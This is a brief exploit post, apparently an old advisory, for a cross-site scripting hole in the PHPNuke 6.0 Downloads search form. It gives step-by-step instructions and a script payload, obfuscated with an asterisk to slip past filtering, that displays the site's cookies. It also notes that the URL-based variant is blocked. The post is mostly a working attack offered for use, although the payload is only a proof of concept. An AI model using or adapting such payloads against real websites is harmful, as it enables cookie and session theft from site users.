Vulnerable systems: PHPNuke 6.0 & mabey all Exploit: 1- go to http://[traget]/modules.php?name=Downloads&d_op=search 2- put in form search this code : <Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> 3- click "Search" (without "*") you can't use it an URL like this http://[traget]/modules.php? name=Downloads&d_op=search&query=<Scri*pt>javascript:alert(document.cookie) </Scri*pt> it will write "I don't like you..." me 2 :) ---------------------------------- Arab Vieruz thanx
